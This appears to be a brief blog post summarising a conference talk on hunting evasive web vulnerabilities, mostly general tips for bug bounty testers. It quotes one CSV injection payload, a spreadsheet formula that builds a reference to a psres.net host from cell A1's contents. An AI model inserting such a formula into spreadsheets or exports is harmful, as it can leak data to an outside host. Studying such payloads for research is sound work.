tl;dr: Hunting Evasive Vulnerabilities

Posted on May 23, 2022

Below are some takeaways from @albinowax’s brilliant presentation at Nullcon Berlin. He explores why some vulnerabilities are evasive and gives some ideas and advice on how to dig them out. You can find the keynote here.

Takeaways

  • Don’t let the appearance of defences deter you from trying the attack anyway. The defences may be misconfigured in a way that nobody understands yet.
  • Seek out old or unfashionable exploit techniques and learn about them from the original research. Often, more modern content is just a diluted version.
  • “That’ll never work…” -> “That’ll never work unless…” Define the ‘unless’ as precisely as possible and try it out.
  • “That’s too obvious…” = infosec version of the bystander effect. Try it anyway, you could be lucky and nobody else has tried it before.
  • App-specific knowledge is highly valuable. Mining a tonne of parameters is not useful if you don’t know how the app itself works.
  • Bug bounty assets are scanned by millions of people using default settings. Flip random switches to discover something different!
  • Curiosity-powered hacking: test hypothesis, ask questions and iterate. Make asking questions cheap. Build on your existing knowledge and assumptions and they may be completely overturned.

And the csv injection payload he shared:

"=INDIRECT(CONCAT(""'\\"",A1,"".psres.net\[f]1'!A1""))""

Possible future project

A note I made to myself for a future project is to develop a tool that maps the popularity of vulnerabilities in the same way as the graphs shown at the 14:00 mark - it would be a decent resource for identifying vulnerabilities that have likely crept back into modern apps IMO. If you know of such a tool or would like to collaborate on developing it, get in touch!